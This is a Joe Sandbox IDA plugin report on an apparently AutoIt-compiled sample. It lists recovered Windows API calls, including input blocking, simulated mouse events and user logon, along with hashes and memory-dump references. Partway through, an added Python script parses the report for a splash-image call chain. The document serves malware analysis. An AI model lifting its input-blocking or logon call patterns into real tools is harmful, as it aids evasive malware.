                                                                                  • API ID: __itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 674341424-0
                                                                                  • Opcode ID: 2848019e96dac854ed8e30fb4f83424dc44b5cbcc24dff477c4446ca6882a529
                                                                                  • Instruction ID: 328f170a6034538fbc4b6817bbb233c262b37b8f8e6604cd62332b8ee2f4b58f
                                                                                  • Opcode Fuzzy Hash: 2848019e96dac854ed8e30fb4f83424dc44b5cbcc24dff477c4446ca6882a529
                                                                                  • Instruction Fuzzy Hash: BA2296716083069BD724DF24C884B6FBBE4BF84304F10491EFA9A9B291DB75ED45CB86
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1b1aab108974e194b30536ea311ff3ed830af4db6f80678d61df8171f2d374a4
                                                                                  • Instruction ID: 9a8678241e918343a18ca6bce717375e9415f10f7234f2deb919954492f9f8a7
                                                                                  • Opcode Fuzzy Hash: 1b1aab108974e194b30536ea311ff3ed830af4db6f80678d61df8171f2d374a4
                                                                                  • Instruction Fuzzy Hash: FAB1F030D2AF518DD22396388835336BB5C6FBB2D5B91E71BFC1A74D62FB2181875280
                                                                                  APIs
                                                                                  • __time64.LIBCMT ref: 0053B6DF
                                                                                    • Part of subcall function 0051344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0053BDC3,00000000,?,?,?,?,0053BF70,00000000,?), ref: 00513453
                                                                                    • Part of subcall function 0051344A: __aulldiv.LIBCMT ref: 00513473
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                                  • String ID:
                                                                                  • API String ID: 2893107130-0
                                                                                  • Opcode ID: 410e878339f32b25b790f1ef309d72a25a7984db5149f735b747de3f5c648c46
                                                                                  • Instruction ID: 1a917700c25024365702ebae4f4ad85d43712d242a75d6ccec611ff9a89f3639
                                                                                  • Opcode Fuzzy Hash: 410e878339f32b25b790f1ef309d72a25a7984db5149f735b747de3f5c648c46
                                                                                  • Instruction Fuzzy Hash: 9C2172726345108BD729CF68C491A92BBE1EB95310B248E6DE4E5CB2C1CB74B909DB54
                                                                                  APIs
                                                                                  • BlockInput.USER32(00000001), ref: 00546ACA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlockInput
                                                                                  • String ID:
                                                                                  • API String ID: 3456056419-0
                                                                                  • Opcode ID: ab7558b1bff3d97a6d68088ff90b4ce04e51c97556d980fe1d4b7314964a416b
                                                                                  • Instruction ID: 941735c58568dc01e9cae7ebd3dcdd9bde7eaf6d9fa96841943f306970f74a74
                                                                                  • Opcode Fuzzy Hash: ab7558b1bff3d97a6d68088ff90b4ce04e51c97556d980fe1d4b7314964a416b
                                                                                  • Instruction Fuzzy Hash: 1CE01235200204AFD700EB5AD404A9ABBFDBFB5755F048466E949D7291DAB0F8449BA1
                                                                                  APIs
                                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0053750A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: mouse_event
                                                                                  • String ID:
                                                                                  • API String ID: 2434400541-0
                                                                                  • Opcode ID: 37d6921756cd562465cd64aee1799a0d8399c5657232bee36398448d887225ea
                                                                                  • Instruction ID: 03f17ab30f1d4c6f386d34204980d66e8c0e602270f6c299231520eb8d78335e
                                                                                  • Opcode Fuzzy Hash: 37d6921756cd562465cd64aee1799a0d8399c5657232bee36398448d887225ea
                                                                                  • Instruction Fuzzy Hash: C4D06CF596C60D6AEC3907249C1BFB61F58B348781FD48989B616A90C0A8A46D45B031
                                                                                  APIs
                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0052AD3E), ref: 0052B124
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LogonUser
                                                                                  • String ID:
                                                                                  • API String ID: 1244722697-0
                                                                                  • Opcode ID: 2d0d2442c5d305015e7bc3612e631d41aa1b23d5bde5ef2b84ec8014520b067a
                                                                                  • Instruction ID: 49760e8aa9cccd62b4ba800a578d11421841a68a48d39cc060429f52dc7eb5a7
                                                                                  • Opcode Fuzzy Hash: 2d0d2442c5d305015e7bc3612e631d41aa1b23d5bde5ef2b84ec8014520b067a
                                                                                  • Instruction Fuzzy Hash: 98D05E320A460EAEDF024FA4EC06EAE3F6AEB04700F408110FA15D50A0C672D531AB60
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: 90e1a73d660963a47de537e59c37c2eed115107b6aa5985cf60f48a5988c2d26
                                                                                  • Instruction ID: 5c24804a149bdf555e017179ab894ee18d3e26f40880d7617cba13f3204dfc6e
                                                                                  • Opcode Fuzzy Hash: 90e1a73d660963a47de537e59c37c2eed115107b6aa5985cf60f48a5988c2d26
                                                                                  • Instruction Fuzzy Hash: FDC04CB1400509DFD751CBC0D9489EEB7BCAB04301F105091A106F2110D7709B85AF72
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0051818F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: c763e729a5b4be13f3e3e14518f3af58b05ee74bc4c7f4a7ec3367498868c464
                                                                                  • Instruction ID: 60bfffac5a2a49a8c974534a0de8bfd579af12f7ab6bdd9aeafc4326c62ff7b4
                                                                                  • Opcode Fuzzy Hash: c763e729a5b4be13f3e3e14518f3af58b05ee74bc4c7f4a7ec3367498868c464
                                                                                  • Instruction Fuzzy Hash: 5FA0113000020CAB8F002B82FC088883FBCEA002A0B000020F80C080208B22A8A0AAA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ca8bd0d444fef49babc84a2333fd6951c3959c762bb31790bdb64ea5fa28577
                                                                                  • Instruction ID: 4bce4e5a0261ce4742c0266d3c679cbfbc16737d3eea233cabbb631cb9175d88
                                                                                  • Opcode Fuzzy Hash: 0ca8bd0d444fef49babc84a2333fd6951c3959c762bb31790bdb64ea5fa28577
                                                                                  • Instruction Fuzzy Hash: DB129C70A00609AFDF04DFA5D985ABEB7F5FF48300F20452AE906E7290EB39AD15CB55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7d17fcbbc11c15caa134db53d7bb30c52f8588d3510ba9389e3638fbb26c1140
                                                                                  • Instruction ID: f5df1f0bcb9467894e4868afcf1ed6d3949abb2282fd21bde763ad5eed53c17b
                                                                                  • Opcode Fuzzy Hash: 7d17fcbbc11c15caa134db53d7bb30c52f8588d3510ba9389e3638fbb26c1140
                                                                                  • Instruction Fuzzy Hash: 2912BF7090020E9FDB24DF55C444ABEBBF1FF58305F14806ADA469B361E739AD82CB96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 3728558374-0
                                                                                  • Opcode ID: 3fe1dca958730875c259e0b4a37b94d3896b8c0fc2474892ca5a664d2d3c06f5
                                                                                  • Instruction ID: 44c048173c7731a3ae0a64a7d11fc9324a1af3805dbb529a054ff81271fb2038
                                                                                  • Opcode Fuzzy Hash: 3fe1dca958730875c259e0b4a37b94d3896b8c0fc2474892ca5a664d2d3c06f5
                                                                                  • Instruction Fuzzy Hash: 6302D170A00209DFCF14DF68D982ABEBBB5FF45300F10846AE906DB295EB35DA15CB95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                  • Instruction ID: ac1025df42c106e482e22e4e713f2437a0d29964f1781588fa18773f40a1d485
                                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                  • Instruction Fuzzy Hash: 56C1D3322051930AEF6D463AC47447EBEA17BA27B531A176DD8B3CB4D1EF60C5A4D720
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                  • Instruction ID: e06aff1dde32568508b1ed813364004d9bc3ee42e1479c1510bc69d56891a2dd
                                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                  • Instruction Fuzzy Hash: 51C1C1322091930AEF6D4639C43447EBEA17FA2BB531A276DD4B2CB4D5EF20D5A4D720
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction ID: 6e3011a137f1bbf5eede4aa5302a38f0560705b32303abfe10e1162d7a86122e
                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction Fuzzy Hash: FDC17E322090930ADB7D4639C47443EBFA57BA2BB531A077DD8B2CB9D5EE20D964D720
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 0054A2FE
                                                                                  • DeleteObject.GDI32(00000000), ref: 0054A310
                                                                                  • DestroyWindow.USER32 ref: 0054A31E
                                                                                  • GetDesktopWindow.USER32 ref: 0054A338
                                                                                  • GetWindowRect.USER32(00000000), ref: 0054A33F
                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0054A480
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0054A490
                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A4D8
                                                                                  • GetClientRect.USER32(00000000,?), ref: 0054A4E4
                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0054A51E
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A540
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A553
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A55E
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0054A567
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A576
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0054A57F
                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A586
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0054A591
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A5A3
                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0057D9BC,00000000), ref: 0054A5B9
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0054A5C9
                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0054A5EF
                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0054A60E
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A630
                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A81D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                  • API String ID: 2211948467-2373415609
                                                                                  • Opcode ID: d8634e01449f83524b6edc9f01baa397501956daec5ff672b219fc979bea30f4
                                                                                  • Instruction ID: b628342e213d7b959f8390772e62c8f02defcbc6249f930f6d4161d4ca359511
                                                                                  • Opcode Fuzzy Hash: d8634e01449f83524b6edc9f01baa397501956daec5ff672b219fc979bea30f4
                                                                                  • Instruction Fuzzy Hash: 5202AB75900208EFDB54DFA4DC89EAE7BB9FF48314F008159F909AB2A1D734AD45DB60
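The call list above is the AutoIt runtime's splash-image routine as the sandbox recovered it: a top-level window of class "AutoIt v3", a child "static" control, the image file read wholesale into an HGLOBAL, wrapped in an IStream, decoded by OleLoadPicture and installed with STM_SETIMAGE (0x172). The following is an added example, not Joe Sandbox or AutoIt code: it parses report lines in this exact format into structured calls and tests for that ordered chain, so the same check can be run over other function blocks or other reports. The sample lines are copied from the block above; the chain definition and the helper names are this example's own.

```python
"""Added example, not Joe Sandbox code: parse the per-function "APIs" lines
of a Joe Sandbox report and test whether the call order contains the
file -> HGLOBAL -> IStream -> IPicture -> STM_SETIMAGE chain listed above.
SAMPLE holds lines copied from the report; the chain is this example's own
heuristic for the AutoIt runtime's splash-image routine."""
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence

# Each call is printed as "• Name.MODULE(args), ref: ADDR". The argument list
# is absent when no parameters were recovered (DestroyWindow above), and calls
# observed inside a callee carry a "Part of subcall function X:" prefix.
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                # hex strings, or "?" when not recovered
    ref: int                       # call-site address in the dump
    subcall: Optional[str] = None  # callee address for indirect reports


def parse_api_lines(text: str) -> List[ApiCall]:
    """Calls in report order; lines that do not describe a call are skipped."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub")))
    return calls


def has_chain(calls: Sequence[ApiCall], chain: Sequence[str]) -> bool:
    """True if every API in `chain` occurs in that order (gaps allowed)."""
    idx = 0
    for call in calls:
        if idx < len(chain) and call.name == chain[idx]:
            idx += 1
    return idx == len(chain)


def window_classes(calls: Sequence[ApiCall]) -> List[str]:
    """Class names (second argument) recovered for CreateWindowExW calls."""
    return [c.args[1] for c in calls
            if c.name == "CreateWindowExW" and len(c.args) > 1]


STM_SETIMAGE = 0x172  # static-control message that installs a loaded picture


def is_stm_setimage(call: ApiCall) -> bool:
    """SendMessageW whose uMsg argument decodes to STM_SETIMAGE."""
    if call.name != "SendMessageW" or len(call.args) < 2:
        return False
    try:
        return int(call.args[1], 16) == STM_SETIMAGE
    except ValueError:  # "?" means the analyzer could not recover the value
        return False


# Heuristic: read a file wholesale into an HGLOBAL, wrap it in an IStream,
# decode it with OleLoadPicture and hand the result to a static control.
SPLASH_IMAGE_CHAIN = ("CreateFileW", "GetFileSize", "GlobalAlloc", "ReadFile",
                      "CreateStreamOnHGlobal", "OleLoadPicture", "SendMessageW")

# Lines copied from the report block above; the last one comes from the
# subcall list of a neighbouring function to exercise the prefix handling.
SAMPLE = """\
• DestroyWindow.USER32 ref: 0054A31E
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A4D8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0054A51E
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A540
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A553
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A55E
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A576
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A5A3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0057D9BC,00000000), ref: 0054A5B9
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0054A60E
  • Part of subcall function 0055D575: GetSysColor.USER32(00000012), ref: 0055D5AE
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    print(len(calls), "calls; window classes:", window_classes(calls))
    print("splash-image chain present:", has_chain(calls, SPLASH_IMAGE_CHAIN))
```

The chain match is deliberately a subsequence test rather than an exact sequence, because the sandbox interleaves bookkeeping calls (GlobalLock, GlobalUnlock, CloseHandle) whose presence varies between builds; "?" arguments are treated as unknown rather than as a mismatch.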
                                                                                  APIs
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0055D2DB
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0055D30C
                                                                                  • GetSysColor.USER32(0000000F), ref: 0055D318
                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 0055D332
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0055D341
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0055D36C
                                                                                  • GetSysColor.USER32(00000010), ref: 0055D374
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0055D37B
                                                                                  • FrameRect.USER32(?,?,00000000), ref: 0055D38A
